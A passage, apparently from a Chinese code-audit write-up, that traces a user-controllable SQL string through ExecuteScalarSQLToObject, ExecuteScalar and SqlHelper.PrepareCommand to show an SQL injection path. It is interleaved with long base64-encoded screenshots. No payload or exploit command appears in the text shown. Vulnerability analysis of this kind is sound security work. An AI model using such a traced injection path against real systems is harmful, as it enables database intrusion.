BUJa8lrQsfjuu+v8pOgMVzAQAvKtxyDgAAAAAA3Co1IRwAAAAAAHCH5BwAAAAAAM9IzgEAAAAA8MxJcr61tSVbW1suigIAAAAAoHMGtgV0YbZNAAAAAACqRLd2AAAAAAA8IzkHAAAAAMAzknMAAAAAADyzSs6vXr0qN27ccBULAAAAAACdZJWc37p1Sy5duuQqFgAAAAAAOskqOb97966cP3/eVSwAAAAAAHQSY84BAAAAAPCM5BwAAAAAAM+C9fX1yLaQra0tERG5cuWKdUAAAAAAAHSNk+QcAAAAAACUR7d2AAAAAAA8IzkHAAAAAMAzknMAAAAAADwb2Jw8/fq3ZfXJfekdPnMVDwAAAABP+qcvSv/Ma77DABrpjf/hnLz2zVfkb//2bysp3yo5X6yOJAqsigDQEpPJRDY3N0vvB/Ac9xLgBvdSNYLVl6V34lXfYQCN9Oo3vyl/8idnKyvfqlt7f/ZUgmjuKpbG2t7e9h0CaqR6vm/+7Kry56bQxcdrFz5xLwFucC+hSk1/LQFN5vq9zio5Hz74cOm7tG9vb8t4PPYdBmqier5v/uyqXP75r1/4uSmy4huPx3wQghfcS4Ab3EuoUtNfS0CTVfFe18o+6RvXboqIyO3rlyutp47EPH7Sytbz0Q8/fmHbhffXrWKqQxz3hffX5aMffvzl//E21XFVW9YvYuI3h2W8tjTup2bcT0Vfb8lvmpN/5NLbfONeMse95EZV95KqdfTyz3+tbTV1fQ9yL7XH7/589MK27//D09z9ye2q323rV20vWraq/KLnFy2/ijqq5CL+3/35qJbHNaZ6ffp6zMu817UyOTdVVxJfhotvjeMPDultbZD8wJPe7oKrD05N/0a56fHVhfup+fdT1ms1TgrytlWJe+k57qXlv5dUr+84Kdfdd0XuCe6l59rQOyDvuVIlVcmkKGu/LoEumpjnla/ab1pH+tishK+MvMev6Wzjr/pa49iScdb5+Fb1XmfVrf1wtCZh/5iTQIq4ff1ybsK9ce3ml8fFSXoRVX+jOx6Pa/sWteoPRVWWf+H99dwPMS4+SOme7/QHnKYxjW/ZuxFyP5mp437iXmo37iUz3Et63EvP1XkvldX011IRPltIfSfcvuvX+f4/PK3s+dCVm95eZQxVvddZtZzPRmsyPNgTWRzYFFO5JracV6UN3QaBtuB+AtzgXmq2tidmy2oymSi3xzPQ5+2vgqq1UrW/6vptqeKvI7FvU5d2lbbH3wb23doDB1EUkGwFVyXdyf1VdWvXffuR/oY0Pu6dd96Rt99+W3mMjeSYOJXkt/a6rnTJY1Tj6ZL1pI8rWr6qniy62FT7s7
<p blockindex=23>8、回到第6步的代码，最终还会走到ExecuteScalarSQLToObject方法中，可控入参只有sql，为第二个形参，跟进看代码发现又直接传入ExecuteScalar方法，sql对应形参strSQL：</p>
<p blockindex=24><img src="data:image/png;base64,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
<p blockindex=25><img src="data:image/png;base64,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
<p blockindex=26>9、再次跟进代码,再次进入ExecuteScalar方法，参数传递为strSQL-&gt;cmdText</p>
<p blockindex=27><img src="data:image/png;base64,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
<p blockindex=28>10、cmdText又会传入SqlHelper.PrepareCommand方法，</p>
<p blockindex=29><img src=data:image/png;base64,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